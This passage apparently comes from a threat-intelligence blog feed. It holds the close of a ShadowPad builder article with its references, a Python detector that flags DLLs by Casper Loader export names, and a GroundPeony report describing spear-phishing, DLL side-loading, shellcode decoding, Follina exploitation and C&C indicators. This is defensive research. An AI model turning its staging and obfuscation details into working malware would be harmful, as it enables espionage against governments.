id="fnref:17" role="doc-noteref"><a href="#fn:17" class="footnote" rel="footnote">17</a></sup><sup id="fnref:18" role="doc-noteref"><a href="#fn:18" class="footnote" rel="footnote">18</a></sup><sup id="fnref:19" role="doc-noteref"><a href="#fn:19" class="footnote" rel="footnote">19</a></sup><sup id="fnref:20" role="doc-noteref"><a href="#fn:20" class="footnote" rel="footnote">20</a></sup><sup id="fnref:21" role="doc-noteref"><a href="#fn:21" class="footnote" rel="footnote">21</a></sup><sup id="fnref:22" role="doc-noteref"><a href="#fn:22" class="footnote" rel="footnote">22</a></sup><sup id="fnref:23" role="doc-noteref"><a href="#fn:23" class="footnote" rel="footnote">23</a></sup><sup id="fnref:24" role="doc-noteref"><a href="#fn:24" class="footnote" rel="footnote">24</a></sup><sup id="fnref:25" role="doc-noteref"><a href="#fn:25" class="footnote" rel="footnote">25</a></sup><sup id="fnref:26" role="doc-noteref"><a href="#fn:26" class="footnote" rel="footnote">26</a></sup><sup id="fnref:27" role="doc-noteref"><a href="#fn:27" class="footnote" rel="footnote">27</a></sup><sup id="fnref:28" role="doc-noteref"><a href="#fn:28" class="footnote" rel="footnote">28</a></sup><sup id="fnref:29" role="doc-noteref"><a href="#fn:29" class="footnote" rel="footnote">29</a></sup><sup id="fnref:30" role="doc-noteref"><a href="#fn:30" class="footnote" rel="footnote">30</a></sup><sup id="fnref:31" role="doc-noteref"><a href="#fn:31" class="footnote" rel="footnote">31</a></sup><sup id="fnref:32" role="doc-noteref"><a href="#fn:32" class="footnote" rel="footnote">32</a></sup><sup id="fnref:33" role="doc-noteref"><a href="#fn:33" class="footnote" rel="footnote">33</a></sup><sup id="fnref:34" role="doc-noteref"><a href="#fn:34" class="footnote" rel="footnote">34</a></sup><sup id="fnref:35" role="doc-noteref"><a href="#fn:35" class="footnote" rel="footnote">35</a></sup><sup id="fnref:36" role="doc-noteref"><a href="#fn:36" class="footnote" rel="footnote">36</a></sup><sup id="fnref:37" 
role="doc-noteref"><a href="#fn:37" class="footnote" rel="footnote">37</a></sup><sup id="fnref:38" role="doc-noteref"><a href="#fn:38" class="footnote" rel="footnote">38</a></sup>, many targeted attack groups use ShadowPad. These can be broadly categorized into two groups: attack groups associated with the MSS, like APT41, and those associated with the PLA, like Tick.</p> <p>As previously mentioned, it is generally believed that whg and Rose were involved in ShadowPad’s development. There is no compelling reason to refute this, so we will proceed with this assumption. According to a U.S. government report related to APT41<sup id="fnref:39" role="doc-noteref"><a href="#fn:39" class="footnote" rel="footnote">39</a></sup>, Rose (Tan Dailin) was involved in APT41. Seven individuals were indicted for their involvement with APT41, with Rose (and Zhang Haoran) being particularly noted for their involvement in both BARIUM and LEAD, making them key figures in APT41’s activities. This background suggests that BARIUM was the earliest adopter of ShadowPad, followed by LEAD.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/16.png" alt="" /></p> <p>In contrast, the PLA has many more attack groups using ShadowPad than the MSS. This is generally because many researchers have given them different names, and their relationships are not sufficiently organized. If you are a researcher, you probably have more organized information in your mind (or within your organization). Of course, we understand and accept this. However, to keep things simple, we will exclude such discussions in this article and share how we organized this information within nao_sec. Interestingly, all these attack groups used the RoyalRoad RTF Weaponizer. Is this just a coincidence? 
ShadowPad and RoyalRoad RTF Weaponizer may be shared through the same channels.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/17.png" alt="" /></p> <h2 id="conclusion">Conclusion</h2> <p>In this article, we introduced the ShadowPad builder. ShadowPad, widely used by various targeted attack groups as a successor to PlugX, had limited information available about its builder until now. This article sheds light on how attackers build ShadowPad.</p> <p>We also organized the relationships between attack groups using ShadowPad. Our research is still ongoing. We would love to engage in active discussions. If you have any opinions or comments, please contact us. We look forward to hearing from you.</p> <h2 id="acknowledgments">Acknowledgments</h2> <p>We received a lot of help from our friends in writing this article. While we won’t name individuals here, we are immensely grateful to the many supportive reviewers. We want to take this opportunity to express our deepest gratitude to you.</p> <h2 id="references">References</h2> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>TrendMicro, “Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data”, https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p>マクニカ, “標的型攻撃の実態と対策アプローチ 第5版 日本を狙うサイバーエスピオナージの動向 2020年度”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5.pdf <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a> <a href="#fnref:2:1" class="reversefootnote" role="doc-backlink">&#8617;<sup>2</sup></a> <a href="#fnref:2:2" class="reversefootnote" role="doc-backlink">&#8617;<sup>3</sup></a></p> </li> <li id="fn:3" role="doc-endnote"> <p>nao_sec, “An Overhead View 
of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:4" role="doc-endnote"> <p>nao_sec, “Royal Road! Re:Dive”, https://nao-sec.org/2021/01/royal-road-redive.html <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:5" role="doc-endnote"> <p>SentinelOne, “ShadowPad A Masterpiece of Privately Sold Malware in Chinese Espionage”, https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/ <a href="#fnref:5" class="reversefootnote" role="doc-backlink">&#8617;</a> <a href="#fnref:5:1" class="reversefootnote" role="doc-backlink">&#8617;<sup>2</sup></a> <a href="#fnref:5:2" class="reversefootnote" role="doc-backlink">&#8617;<sup>3</sup></a></p> </li> <li id="fn:6" role="doc-endnote"> <p>FBI, “APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central”, https://www.ic3.gov/Media/News/2021/211220.pdf <a href="#fnref:6" class="reversefootnote" role="doc-backlink">&#8617;</a> <a href="#fnref:6:1" class="reversefootnote" role="doc-backlink">&#8617;<sup>2</sup></a></p> </li> <li id="fn:7" role="doc-endnote"> <p>HarfangLab, “A comprehensive analysis of I-Soon’s commercial offering”, https://harfanglab.io/en/insidethelab/isoon-leak-analysis/ <a href="#fnref:7" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:8" role="doc-endnote"> <p>Kaspersky, “ShadowPad in corporate networks”, https://securelist.com/shadowpad-in-corporate-networks/81432/ <a href="#fnref:8" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:9" role="doc-endnote"> <p>Kaspersky, “Operation ShadowHammer”, https://securelist.com/operation-shadowhammer/89992/ <a href="#fnref:9" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:10" role="doc-endnote"> <p>ESET, “Connecting the dots: Exposing the arsenal 
and methods of the Winnti Group”, https://www.welivesecurity.com/2019/10/14/connecting-dots-exposing-arsenal-methods-winnti/ <a href="#fnref:10" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:11" role="doc-endnote"> <p>ESET, “Winnti Group targeting universities in Hong Kong”, https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ <a href="#fnref:11" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:12" role="doc-endnote"> <p>マクニカ, “標的型攻撃の実態と対策アプローチ 第4版 日本を狙うサイバーエスピオナージの動向 2019年度下期”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2019_4.pdf <a href="#fnref:12" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:13" role="doc-endnote"> <p>PwC, “Around the world in 80 days 4.2bn packets”, https://www.youtube.com/watch?v=YCwyc6SctYs <a href="#fnref:13" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:14" role="doc-endnote"> <p>CrowdStrike, “Manufacturing Industry in the Adversaries’ Crosshairs”, https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ <a href="#fnref:14" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:15" role="doc-endnote"> <p>Kaspersky, “APT trends report Q2 2020”, https://securelist.com/apt-trends-report-q2-2020/97937/ <a href="#fnref:15" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:16" role="doc-endnote"> <p>Positive Technologies, “ShadowPad: new activity from the Winnti group”, https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf <a href="#fnref:16" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:17" role="doc-endnote"> <p>Symantec, “APT41: Indictments Put Chinese Espionage Group in the Spotlight”, https://symantec-enterprise-blogs.security.com/threat-intelligence/apt41-indictments-china-espionage <a href="#fnref:17" 
class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:18" role="doc-endnote"> <p>Dr.Web, “Study of the ShadowPad APT backdoor and its relation to PlugX”, https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf <a href="#fnref:18" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:19" role="doc-endnote"> <p>TrendMicro, “Earth Akhlut: Exploring the Tools, Tactics, and Procedures of an Advanced Threat Actor Operating a Large Infrastructure”, https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf <a href="#fnref:19" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:20" role="doc-endnote"> <p>ESET, “Operation StealthyTrident: corporate software under attack”, https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ <a href="#fnref:20" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:21" role="doc-endnote"> <p>Positive Technologies, “Higaisa or Winnti? 
APT41 backdoors, old and new”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ <a href="#fnref:21" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:22" role="doc-endnote"> <p>Recorded Future, “China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions”, https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf <a href="#fnref:22" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:23" role="doc-endnote"> <p>Recorded Future, “Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling”, https://www.recordedfuture.com/blog/chinese-group-tag-22-targets-nepal-philippines-taiwan <a href="#fnref:23" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:24" role="doc-endnote"> <p>TrendMicro, “Delving Deep: An Analysis of Earth Lusca’s Operations”, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf <a href="#fnref:24" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:25" role="doc-endnote"> <p>Secureworks, “ShadowPad Malware Analysis”, https://www.secureworks.com/research/shadowpad-malware-analysis <a href="#fnref:25" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:26" role="doc-endnote"> <p>Recorded Future, “Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group”, https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf <a href="#fnref:26" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:27" role="doc-endnote"> <p>SentinelOne, “Moshen Dragon’s Triad-and-Error Approach Abusing Security Software to Sideload PlugX and ShadowPad”, 
https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ <a href="#fnref:27" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:28" role="doc-endnote"> <p>TeamT5, “The Next Gen PlugX - ShadowPad - A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT”, https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf <a href="#fnref:28" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:29" role="doc-endnote"> <p>Positive Technologies, “Space Pirates: analyzing the tools and connections of a new hacker group”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ <a href="#fnref:29" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:30" role="doc-endnote"> <p>Kaspersky, “Attacks on industrial control systems using ShadowPad”, https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ <a href="#fnref:30" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:31" role="doc-endnote"> <p>ESET, “Worok: The big picture”, https://www.welivesecurity.com/2022/09/06/worok-big-picture/ <a href="#fnref:31" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:32" role="doc-endnote"> <p>Elastic, “Update to the REF2924 intrusion set and related campaigns”, https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns <a href="#fnref:32" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:33" role="doc-endnote"> <p>Symantec, “Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors”, https://symantec-enterprise-blogs.security.com/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor <a href="#fnref:33" class="reversefootnote" 
role="doc-backlink">&#8617;</a></p> </li> <li id="fn:34" role="doc-endnote"> <p>TrendMicro, “Possible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad”, https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html <a href="#fnref:34" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:35" role="doc-endnote"> <p>Recorded Future, “RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale”, https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf <a href="#fnref:35" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:36" role="doc-endnote"> <p>Symantec, “Redfly: Espionage Actors Continue to Target Critical Infrastructure”, https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks <a href="#fnref:36" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:37" role="doc-endnote"> <p>Palo Alto Networks, “Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda”, https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ <a href="#fnref:37" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:38" role="doc-endnote"> <p>TrendMicro, “Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks”, https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html <a href="#fnref:38" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:39" role="doc-endnote"> <p>United States Department of Justice, “Seven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally”, https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer <a href="#fnref:39" class="reversefootnote" 
role="doc-backlink">&#8617;</a></p> </li> </ol> </div>
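The hunting query in the post (exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2) keys on the export names of the Casper Loader DLL. The following is an added example, not code from the post or from nao_sec, of how a defender can run the same check locally on a DLL: a small pure-Python walk of the PE export directory (handles PE32 and PE32+, no third-party PE library) and a flag function that tests the three names. Because real loader samples cannot be shipped here, `build_sample_dll` constructs a minimal PE32 fixture inline whose only section holds an export table; that fixture, the export names in the benign sample, and the section layout (section RVA equal to file offset) are constructed for the example and are not taken from any real file.

```python
import struct

# Export names the post's hunting query keys on
# (exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2).
CASPER_LOADER_EXPORTS = frozenset({"IEE2", "LoadLibraryShim2", "LoadStringRC2"})


def _rva_to_offset(rva, sections):
    """Map an RVA to a file offset via the section table entries (va, raw_ptr, raw_size)."""
    for va, raw_ptr, raw_size in sections:
        if va <= rva < va + raw_size:
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _cstring(data, off):
    end = data.index(b"\x00", off)
    return data[off:end].decode("ascii", "replace")


def pe_export_names(data):
    """Return the exported function names of a PE file given as bytes (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:      # PE32: data directories start at optional header + 96
        dd_off = opt + 96
    elif magic == 0x20B:    # PE32+: data directories start at optional header + 112
        dd_off = opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    export_rva, export_size = struct.unpack_from("<II", data, dd_off)
    if export_rva == 0 or export_size == 0:
        return []           # no export directory at all
    sec_off = opt + opt_size
    sections = []
    for i in range(nsec):   # VirtualAddress, SizeOfRawData, PointerToRawData sit at +12 of each header
        va, raw_size, raw_ptr = struct.unpack_from("<III", data, sec_off + i * 40 + 12)
        sections.append((va, raw_ptr, raw_size))
    exp = _rva_to_offset(export_rva, sections)
    n_names = struct.unpack_from("<I", data, exp + 0x18)[0]    # NumberOfNames
    names_rva = struct.unpack_from("<I", data, exp + 0x20)[0]  # AddressOfNames
    if n_names == 0:
        return []
    names_off = _rva_to_offset(names_rva, sections)
    names = []
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", data, names_off + 4 * i)[0]
        names.append(_cstring(data, _rva_to_offset(name_rva, sections)))
    return names


def matches_casper_loader_exports(data):
    """True when the DLL exports all three names the post hunts on."""
    return CASPER_LOADER_EXPORTS.issubset(pe_export_names(data))


def build_sample_dll(export_names, dll_name=b"mscoree.dll"):
    """Constructed fixture: a minimal PE32 DLL whose single section holds an export directory.
    Section RVA == file offset, so RVAs can be written directly while laying the body out."""
    sec_rva = 0x200
    n = len(export_names)
    body = bytearray(40)                                  # IMAGE_EXPORT_DIRECTORY, filled below
    func_tbl = sec_rva + len(body)
    body += b"".join(struct.pack("<I", 0x1000 + 0x10 * i) for i in range(n))  # dummy function RVAs
    name_tbl = sec_rva + len(body)
    name_ptrs_at = len(body)
    body += b"\0" * (4 * n)                               # name pointer table, filled below
    ord_tbl = sec_rva + len(body)
    body += b"".join(struct.pack("<H", i) for i in range(n))
    dllname_rva = sec_rva + len(body)
    body += dll_name + b"\0"
    for i, nm in enumerate(export_names):
        struct.pack_into("<I", body, name_ptrs_at + 4 * i, sec_rva + len(body))
        body += nm.encode("ascii") + b"\0"
    struct.pack_into("<IIHHIIIIIII", body, 0, 0, 0, 0, 0, dllname_rva, 1, n, n,
                     func_tbl, name_tbl, ord_tbl)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)  # i386, one section, DLL
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                   # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96, sec_rva, len(body))  # export directory RVA / size
    sec = struct.pack("<8sIIIIIIHHI", b".edata", len(body), sec_rva, len(body), sec_rva,
                      0, 0, 0, 0, 0x40000040)
    hdr = dos + b"PE\0\0" + coff + opt + sec
    hdr += b"\0" * (sec_rva - len(hdr))
    return bytes(hdr + body)


if __name__ == "__main__":
    for label, names in (("casper-like", ["IEE2", "LoadLibraryShim2", "LoadStringRC2"]),
                         ("benign", ["DllGetVersion", "VerQueryValueW"])):
        sample = build_sample_dll(names)
        print(label, pe_export_names(sample), matches_casper_loader_exports(sample))
```

Run over a directory of side-loaded DLLs (mscoree.dll next to an AppLaunch.exe is the pairing the post describes), `matches_casper_loader_exports` gives the same triage signal as the retrohunt query without depending on an external service; export names are cheap for an author to change, so treat a hit as a lead for the XOR-constant comparison the post performs, not as a verdict.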
  55. GroundPeony: Crawling with Malice

    Tue, 22 Aug 2023 03:00:00 -0000

    This blog post is based on “GroundPeony: Crawling with Malice” that we presented at HITCON CMT 2023. We are grateful to HITCON for giving us the opportunity to present. https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/ Presentation material (PDF) is here.

    Abstract

    In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders. In this post, we will first provide an overview of this attack campaign and share the analysis results of the malware used. Through this, the reader will be able to understand the latest attack cases targeting Taiwan. As a result of our investigation, we suspect that this attack campaign was orchestrated by a China-nexus attack group. We will discuss the specific evidence supporting this assumption and trace back to past attack campaigns. Past campaigns include attacks that exploited CVE-2022-30190, known as Follina, at the zero-day stage. These studies enable us to understand the attacker’s motivations and background. This post will enable SOC analysts, IR team members, CSIRT personnel, and others to gain a deep understanding of the latest APT attack trends targeting East and South Asia, including Taiwan, that have not been reported so far, and to take concrete countermeasures.

    GroundPeony

    The name “GroundPeony” was created by us and is not generally known. Based on our reading of the few public reports, we believe they are identical or close to the group dubbed UNC33471 by Mandiant. Active since at least 2021, it targets government organizations in East and South Asia, specifically Taiwan and Nepal. There are two points to note about this group. First, GroundPeony exploits zero-day vulnerabilities. Specifically, it was the earliest to exploit CVE-2022-30190, also known as Follina. Follina itself is not a very complex vulnerability, but it is speculated that this group could develop or have access to a zero-day. This is very interesting. Second, GroundPeony compromised websites for malware distribution. In a past case, Nepal’s government website was compromised. For these reasons, GroundPeony is considered to be an APT group with high attack skill and strong attack motivation.

    Timeline

    This is a quick look at GroundPeony’s attack timeline. The malware has existed on VirusTotal since around 2021. The oldest attack campaign we know of is from April to June 2022. Around this time, Follina was exploited to attack Nepal, India, and other countries. After that, we forgot about them for a while, but they started attacking again around March 2023. At this time, they attacked Taiwan and Nepal. In this post, we will deal with the cases of April 2022 and March 2023.

    Latest Attack Flow

    Let’s look at a specific case. The first is the attack on the Taiwanese government that occurred in March 2023. The attack started with a spear-phishing email. The email has a DOC file attached. A URL is written in the DOC file, and a ZIP file is downloaded from that URL. The ZIP file contains an EXE file and a DLL file, and executing them infects the host with malware.

    The spear-phishing email looked like this. It is about discussions on maritime issues between Taiwan and the USA. This time, I put a mosaic in the image, but the destination was a Taiwanese government organization. Also, the source is a cable TV company in Taiwan. Attached to the email is a DOC file with the file name “Regarding bilateral consultations with the USA”.

    When the attached DOC file is opened, it looks like this. Instead of something like a file name, it pretends to show an error. It says to apply an update to resolve the error, and a URL is given for downloading the update. When you try to download the update file from this URL, it actually downloads a ZIP file containing malware.

    The URL used at this time is very strange. At first glance, it may look like a legitimate Microsoft website. But, due to the structure of the URL, the original host information is Cuttly. When you access this URL, you are sent to Cuttly, and it redirects to the ZIP file. At this time, the URL redirected from Cuttly was the website of a Taiwanese educational institution. This website had been compromised, and a ZIP file containing malware was placed on it.

    The ZIP file contains 2 EXE files, one TXT file, and one directory named “$RECYCLE.BIN” that looks like the Windows Recycle Bin. There are 4 files in the $RECYCLE.BIN directory, all with the DOCX extension. But these are not DOCX files. They are actually malware. By the way, did you notice that the update numbers written in the DOC file and in the ZIP file are different? We don’t know if this was simply a mistake by the attacker or a remnant of another ongoing attack campaign.

    Malware Analysis

    Let’s take a look at how the malware is executed. First, there are 2 files with the EXE extension included in the ZIP file, 系統安全補丁.exe and Install.exe, but their behavior is the same. When the EXE file is executed, the 4 files placed in $RECYCLE.BIN are copied to the mic directory under the ProgramData directory. At this time, the names of the 4 files are also changed: they are renamed to mic.exe, version.dll, mic.doc and mic.ver. Then, mic.exe is executed. mic.exe is a legitimate file with a digital signature, but it loads the version.dll which exists in the same directory. When version.dll is executed by DLL Side-Loading, it loads and decrypts mic.doc. The decryption result is the malware we call “micDown”.

    mic.exe      Legitimate EXE file with a digital signature
    version.dll  DLL for Side-Loading; shellcode launcher for mic.doc
    mic.doc      Shellcode downloader (micDown)
    mic.ver      Config file for micDown

    The decoding process of version.dll has two steps. First, version.dll decodes mic.doc and executes it as shellcode. The shellcode further decodes itself and continues execution. The export function of version.dll is very simple. First, it reads mic.doc into a memory area allocated by VirtualAlloc with read, write, and execute permissions. Then, it decodes that data with a custom XOR algorithm that combines sub, xor and add instructions. When decoding is complete, the process moves to the memory area where the decoded shellcode is located.

    The decoded shellcode uses the same custom XOR algorithm as before. RtlDecompressBuffer is then used to decompress it. The shellcode is decoded from the beginning of the file, excluding the jump instruction. The decoded code executes the executable with the MZ header removed. It also decodes the data in mic.ver and uses it as a configuration. Finally, it downloads and executes shellcode from the C&C server saved in the config. This shellcode is encoded with an algorithm similar to that of the previous file. It differs slightly from the file encoding algorithm in that the order of the add, sub and xor instructions is swapped. The encoded config consists of a 0x40 byte C&C host area and a 0x2 byte port area. The IP address at this time was 103[.]199.17.184.

    Related File

    An attack similar to the Taiwanese attack we have described was also carried out in Nepal. Although the specific origin of the attack is unknown, a legitimate website was compromised and a ZIP file was placed on it, as was the case in Taiwan. The legitimate website that was compromised was the Nepalese government’s COVID-19 vaccine-related website. For reference, China is known to have provided vaccines to Nepal as part of its One Belt, One Road partnership2. It is unclear what this has to do with the attack campaign. In the attack against Nepal, app.onedrivo[.] com was used as the C&C server. The domain was registered through PublicDomainRegistry. More on this domain later. In the attack against Nepal, the malware behaves the same way. When the EXE file is executed, it copies and renames the files and executes mic.exe.
mic.exe sideloads version.dll. Then version.dll will read, decode and execute mic.doc. The malware executed was the same as the previous one, called micDown. Related Past Campaign The C&amp;C server used in the previous attack on Nepal has been used in other attacks in the past. The attack on Nepal occurred in April 2022. At that time, this group exploited CVE-2022-30190, also known as Follina. Finally, the CobaltStrike beacon is executed. This domain was used as the server to download this CobaltStrike and as the C&amp;C server. The DOCX file that served as the decoy is a statement of accusation by a person claiming to be a student at Kathmandu University. We do not know the authenticity of this accusation. This DOCX file contains the external link settings. This will load the HTML file. The HTML file contains JavaScript code to change the location. The modified location is written with the scheme ms-msdt. This is the scheme for the Microsoft Support Diagnostic Tool. However,a bug existed in this that allowed PowerShell code to be executed. So, PowerShell code to be executed from a DOCX file. The PowerShell code is downloaded, extracted and executed to a CAB file from the server. Inside the CAB file is an EXE file made by PyInstaller. This EXE is a downloader. And can be downloaded from onedrivo[.]com and run the CobaltStrike beacon. Attribution Let us consider the attribution of this group. To begin with, it is important when this group was exploiting Follina. Follina was finally exploited by a very large number of APT groups. But that was after the details were made public. Here is the timeline. The first time Follina became known to the public was through our tweets. We discovered the Follina sample against Belarus on May 27 and tweeted about it. Since then, detailed explanatory blogs have been published and PoCs have been released. Going back earlier, a vulnerability was reported to Microsoft by the ShadowChasing group on April 12. 
However, Microsoft did not acknowledge it as a vulnerability at that time. The attack reported is also against Belarus. Let’s go back further. In our research, we found samples from April 7 and 8. These are attacks against Nepal and India. We believe this is the earliest Follina sample. And these are the attacks by the group Mandiant calls UNC3347, which we call GroundPeony. In other words, GroundPeony was exploiting Follina during a perfect zero-day period. Various organizations have written reports about Follina exploits, but China-nexus is the only group that has exploited Follina during zero-day periods. Therefore, we believe GroundPeony is the only China-nexus APT group with zero-day access. Let’s look at another indicator. We analyzed an EXE file made by PyInstaller that is executed after the Follina exploit. The PyInstaller binary can easily decompile the Python code. The extracted file looked like this. A large amount of Chinese comments were written. Also, the code was copy-pasted from various public repositories, but most of it was written by Chinese developer. This is a very elementary mistake. However, it is highly likely that the person who created the malware is a native Chinese speaker. We tried mapping the victim (or presumed to be). A very interesting diagram. What does this mean? Based on our previous research, we have created a diamond model. GroundPeony, also known as UNC3347, is a China-nexus APT group. They have been active since at least 2021. They target East and South Asia like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. The attacks begin with spear phishing emails. They compromised legitimate websites and use them for their attacks. There was nothing unique about the IP addresses used, and no connection to the victim country could be found. GroundPeony also provides zero-day access. Besides popular tools such as CobaltStrike, they also use group’s original malware. 
